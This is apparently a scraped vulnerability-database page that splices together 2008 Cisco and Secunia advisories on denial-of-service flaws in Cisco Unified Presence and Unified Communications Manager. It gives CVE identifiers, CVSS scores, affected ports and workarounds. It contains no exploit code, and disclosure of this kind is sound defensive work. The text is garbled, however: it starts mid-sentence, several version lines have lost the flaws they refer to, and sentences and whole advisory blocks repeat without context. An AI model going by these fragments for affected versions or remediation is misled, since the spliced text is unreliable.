use those supplied by the vendor.
VAR-200805-0205 | CVE-2008-1741 | Cisco Unified Presence SIP Proxy Service Denial of Service (DoS) Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SIP Proxy (SIPD) service in Cisco Unified Presence before 6.0(3) allows remote attackers to cause a denial of service (core dump and service interruption) via a TCP port scan, aka Bug ID CSCsj64533. This issue is tracked as Bug ID CSCsj64533. Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to cause denial-of-service conditions for legitimate users.
These vulnerabilities were discovered internally by Cisco, and there
are no workarounds.
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml.
Administrators of systems running all Cisco Unified Presence versions
can determine the software version by viewing the main page of the
Cisco Unified Presence Administration interface. The software version
can be determined by running the command show version active via the
Command Line Interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Presence collects information about a user's
availability status and communications capabilities. Using
information captured by Cisco Unified Presence, applications such as
Cisco Unified Personal Communicator and Cisco Unified Communications
Manager can improve productivity by helping users connect with
colleagues more efficiently by determining the most effective means
for collaborative communication. There are no workarounds for these
vulnerabilities. Cisco Unified Presence version 6.0(1) is the
upgrade path for Cisco Unified Presence version 1.0. There is no workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsh50164 - PE Service core dumps when it receives malformed packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsh20972 - PE Service core dumps under stress test
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj64533 - SIPD service core dumps during TCP port scan
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of any of the vulnerabilities may result in
the interruption of presence services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Fixes for all the vulnerabilities listed in this advisory are
included in Cisco Unified Presence version 6.0(3) that is available
at the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were internally discovered by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision |             | Initial       |
| 1.0      | 2008-May-14 | public        |
|          |             | release       |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI
91czchLkcIoB9pmUP9zWEI0=
=gkID
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
performing a TCP port scan on an affected system.
SOLUTION:
Update to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
VAR-200805-0206 | CVE-2008-1742 | Cisco Unified Communications Manager Denial of Service (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, as demonstrated by TCPFUZZ, aka Bug ID CSCsj80609. A series of specially crafted TCP packets, as demonstrated by TCPFUZZ, may put the service into a denial-of-service (DoS) state. This issue is tracked as Bug ID CSCsj80609. Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application.
----------------------------------------------------------------------
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
These vulnerabilities were discovered internally by Cisco. Workarounds
that mitigate some of these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml.
The software version can also be determined by running the command
show version active via the command line interface (CLI).
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability.
SIP-Related Vulnerabilities
Cisco Unified Communications Manager versions 5.x and 6.x contain a
vulnerability in the handling of malformed SIP JOIN messages that may
result in a DoS condition. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can be downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability. For Cisco Unified Communications Manager 5.x and 6.x
systems, the SNMP Trap service is controlled via the Cisco
CallManager SNMP Service selection on the Control Center Feature
Services screen.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service.
Obtaining Fixed Software
========================
Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision |             | Initial       |
| 1.0      | 2008-May-14 | public        |
|          |             | release       |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
VAR-200805-0207 | CVE-2008-1743 | Cisco Unified Communications Manager (CUCM) Service Disruption (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, aka Bug ID CSCsi98433. This issue is tracked as Bug ID CSCsi98433. Please refer to the "Overview" for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application.
----------------------------------------------------------------------
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
These vulnerabilities were discovered internally by Cisco. Workarounds
that mitigate some of these vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml.
The software version can also be determined by running the command
show version active via the command line interface (CLI).
No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
The CTL Provider service is controlled via the Cisco CTL Provider
menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service.
Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
